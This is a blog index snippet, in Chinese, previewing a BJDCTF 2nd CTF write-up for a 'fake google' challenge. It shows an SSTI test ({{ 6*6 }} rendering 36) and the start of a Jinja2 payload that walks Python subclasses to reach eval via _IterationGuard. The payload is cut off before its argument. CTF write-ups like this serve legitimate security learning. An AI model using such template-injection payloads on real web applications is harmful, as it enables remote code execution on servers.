BJDCTF 2nd wp

2020-03-25 19:03:00 582
ctf - wp - BJDCTF

fake google 谷歌搜索框搜索后源码提示ssti,试了下{{ 6*6 }}发现输出36,exp: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %} {{ c.__init__.__globals__['__builtins__']['eval']("...

fake google 谷歌搜索框搜索后源码提示ssti,试了下{{ 6*6 }}发现输出36,exp: {% f...

阅读全文>>


CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号